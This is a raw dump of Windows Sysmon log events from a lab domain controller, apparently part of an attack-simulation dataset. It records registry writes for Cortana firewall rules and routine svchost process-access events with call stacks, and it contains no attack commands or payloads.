13:29:58.951{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{A6FD215D-FC25-48C7-8D48-EE3FD2816B72}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntrAnet|RA62=IntrAnet|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}| 13241300x800000000000000010472Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:58.951{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{19BEB681-EE95-4EF8-99B2-D3A026833B63}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Domain|Profile=Private|Profile=Public|RA42=IntrAnet|RA62=IntrAnet|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}| 13241300x800000000000000010471Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:58.951{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{3507EE72-9B63-4E61-8BDE-D5AFF6F1118E}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}| 13241300x800000000000000010470Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:58.951{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{2BC22595-57AF-4BD4-9359-665563CC98FD}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}| 10341000x800000000000000010469Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.951{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010468Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.951{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010467Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.951{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010466Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.951{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010465Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.935{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010464Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.935{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010463Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.935{08A6967A-4288-6000-1000-000000009A01}11361460C:\Windows\system32\svchost.exe{08A6967A-4756-6000-1C05-000000009A01}3028C:\Windows\System32\ie4uinit.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010462Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.935{08A6967A-4288-6000-1000-000000009A01}11361600C:\Windows\system32\svchost.exe{08A6967A-4756-6000-1C05-000000009A01}3028C:\Windows\System32\ie4uinit.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010461Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.935{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010460Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.935{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010459Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.935{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010458Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.935{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010457Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.935{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010456Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.935{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010455Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.935{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010454Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.935{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010453Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.935{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010452Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.935{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010451Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.935{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010450Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.935{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010449Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.920{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010448Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 